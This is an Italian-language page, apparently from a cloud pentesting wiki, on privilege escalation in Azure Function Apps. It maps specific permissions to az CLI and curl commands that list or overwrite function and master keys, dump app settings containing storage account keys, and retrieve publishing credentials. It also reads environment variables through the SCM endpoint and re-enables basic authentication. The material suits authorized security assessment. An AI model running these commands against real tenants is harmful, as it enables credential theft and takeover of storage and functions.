Az - Functions App Privesc

Function Apps

Controlla la pagina seguente per ulteriori informazioni:

Microsoft.Web/sites/host/listkeys/action

Questo permesso consente di elencare le chiavi della funzione, master e di sistema, ma non quella dell'host, della funzione specificata con:

az functionapp keys list --resource-group <res_group> --name <func-name>

Microsoft.Web/sites/functions/listKeys/action

Questo permesso consente di ottenere la chiave host della funzione specificata con:

az rest --method POST --uri "https://management.azure.com/subscriptions/<subsription-id>/resourceGroups/<resource-group>/providers/Microsoft.Web/sites/<func-name>/functions/<func-endpoint-name>/listKeys?api-version=2022-03-01"

Microsoft.Web/sites/host/functionKeys/write

Questo permesso consente di creare/aggiornare una chiave di funzione per la funzione specificata con:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type functionKeys --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/host/masterKey/write

Questo permesso consente di creare/aggiornare una chiave master per la funzione specificata con:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/host/systemKeys/write

Questo permesso consente di creare/aggiornare una chiave di funzione di sistema per la funzione specificata con:

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/config/list/action

Questo permesso consente di ottenere le variabili ambientali di una funzione. All'interno di queste variabili potrebbe essere possibile trovare le variabili env predefinite AzureWebJobsStorage o WEBSITE_CONTENTAZUREFILECONNECTIONSTRING che contengono effettivamente una chiave dell'account per accedere allo storage blob della funzione con permessi COMPLETI.

az functionapp config appsettings list --name <func-name> --resource-group <res-group>

Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)

Questa autorizzazione consente di elencare tutti i profili di pubblicazione che contengono fondamentalmente credenziali di autenticazione di base:

# Gte creds
az functionapp deployment list-publishing-profiles \
--name basicauthenabled \
--resource-group Resource_Group_1 \
--output json

• Metodo SCM

Quindi, puoi accedere con queste credenziali di autenticazione di base all'URL SCM della tua app di funzione e ottenere i valori delle variabili di ambiente:

# Get env variables values
curl -u '<username>:<password>' \
https://<app-name>.scm.azurewebsites.net/api/settings -v

Nota che il nome utente SCM è solitamente il carattere "$" seguito dal nome dell'app, quindi: $<app-name>.

E queste variabili di ambiente contengono l'AccountKey dell'account di archiviazione che memorizza i dati dell'app di funzione, consentendo di controllare quell'account di archiviazione.

Se vedi che quelle credenziali sono REDACTED, è perché devi abilitare l'opzione di autenticazione di base SCM e per questo hai bisogno del secondo permesso (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):

# Enable basic authentication for SCM
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'

# Enable basic authentication for FTP
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'